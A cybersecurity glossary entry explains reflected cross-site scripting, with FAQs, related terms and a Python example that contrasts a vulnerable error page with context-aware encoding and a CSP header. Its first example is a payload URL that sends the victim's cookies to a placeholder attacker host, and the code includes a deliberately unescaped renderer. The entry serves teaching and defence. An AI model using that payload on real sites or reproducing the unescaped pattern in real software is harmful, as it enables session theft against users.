Reflected XSS
What is Reflected XSS?
A non-persistent XSS where attacker-controlled input from a request is immediately reflected into the response and executed in the victim's browser.
Reflected XSS (also called non-persistent or Type-1) happens when a web application takes data from an HTTP request, typically a URL query parameter or form field, and echoes it back in the response without proper output encoding. The attack requires the victim to click a crafted link, so it is usually delivered through phishing, malvertising, or chat messages. Successful exploitation can steal session cookies, perform actions on behalf of the user, or chain into a full account takeover. Defenses include context-aware HTML encoding, a strict Content Security Policy, the X-XSS-Protection header (legacy), and frameworks that auto-escape templated output.
● Examples
- 01
https://example.com/search?q=<script>document.location='https://evil/?c='+document.cookie</script>
- 02
An error page that reflects an unsanitized 'message' query parameter directly into the DOM.
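The two examples above worked through in code. This is an added Python example, not code from the glossary: plain functions stand in for a request handler, `SAMPLE_MESSAGE` is a constructed input, and the function names (including the page-side `showError`) are hypothetical. It shows the vulnerable reflection of the `message` parameter beside a version that applies the context-aware encoding and CSP header named in the definition.

```python
import html
import json
from urllib.parse import quote

# Constructed sample input (not from the glossary page): a 'message' value
# that tries to close an attribute and inject a script tag.
SAMPLE_MESSAGE = '"><script>steal()</script>'


def render_error_vulnerable(message: str) -> str:
    """The flaw: the query parameter is concatenated straight into the HTML."""
    return (f"<h1>Error: {message}</h1>"
            f'<a href="/retry?message={message}">Retry</a>')


def render_error_safe(message: str) -> str:
    """Fix: encode the value separately for each output context it lands in."""
    text = html.escape(message, quote=False)   # HTML text node: & < > neutralised
    attr = html.escape(message, quote=True)    # quoted attribute: also " and '
    url = quote(message, safe="")              # URL query component: percent-encoded
    # Data handed to an inline script (hypothetical showError): JSON-encode, then
    # escape < and > so the literal can never contain '</script>' and end the block.
    js_data = json.dumps(message).replace("<", "\\u003c").replace(">", "\\u003e")
    return (f"<h1>Error: {text}</h1>"
            f'<a href="/retry?message={url}" title="{attr}">Retry</a>'
            f"<script>showError({js_data});</script>")


def security_headers() -> dict:
    """Defence in depth: a strict CSP refuses inline script even if encoding slips."""
    return {"Content-Security-Policy":
            "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"}


def contains_raw_input(page: str, untrusted: str) -> bool:
    """Regression check: does the untrusted value survive verbatim in the response?"""
    return untrusted in page


if __name__ == "__main__":
    print("vulnerable:", render_error_vulnerable(SAMPLE_MESSAGE))
    print("safe:      ", render_error_safe(SAMPLE_MESSAGE))
    print("headers:   ", security_headers())
```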
● Frequently asked questions
What is Reflected XSS?
A non-persistent XSS where attacker-controlled input from a request is immediately reflected into the response and executed in the victim's browser. It belongs to the Attacks & Threats category of cybersecurity.
What does Reflected XSS mean?
A non-persistent XSS where attacker-controlled input from a request is immediately reflected into the response and executed in the victim's browser.
How does Reflected XSS work?
Reflected XSS (also called non-persistent or Type-1) happens when a web application takes data from an HTTP request, typically a URL query parameter or form field, and echoes it back in the response without proper output encoding. The attack requires the victim to click a crafted link, so it is usually delivered through phishing, malvertising, or chat messages. Successful exploitation can steal session cookies, perform actions on behalf of the user, or chain into a full account takeover. Defenses include context-aware HTML encoding, a strict Content Security Policy, the X-XSS-Protection header (legacy), and frameworks that auto-escape templated output.
How do you defend against Reflected XSS?
Defences for Reflected XSS typically combine technical controls and operational practices. The technical controls named in the definition above are context-aware output encoding, a strict Content Security Policy, frameworks that auto-escape templated output and, as a legacy measure, the X-XSS-Protection header.
What are other names for Reflected XSS?
Common alternative names include: Non-persistent XSS, Type-1 XSS.
● Related terms
- attacks, № 240
Cross-Site Scripting (XSS)
A web vulnerability that allows attackers to inject malicious scripts into pages viewed by other users, executing in the victim's browser under the site's origin.
- attacks, № 1107
Stored XSS
A persistent cross-site scripting flaw where attacker-supplied script is saved on the server and later executed in every visitor's browser.
- attacks, № 347
DOM-Based XSS
An XSS variant where the injection and execution happen entirely in the browser as client-side JavaScript writes untrusted data into a sink without sanitization.
- appsec, № 214
Content Security Policy (CSP)
An HTTP response header that tells the browser which sources of scripts, styles, frames and other content are allowed, limiting the impact of XSS and data-injection attacks.
- attacks, № 821
Phishing
A social-engineering attack in which an attacker impersonates a trusted party to trick a victim into revealing credentials, transferring money, or running malware.
- appsec, № 773
Output Encoding
Transforming untrusted data into a form that is safe for a specific output context — HTML, JavaScript, URL, SQL, shell — so it cannot break out and execute as code.
● See also
- № 104 Blind XSS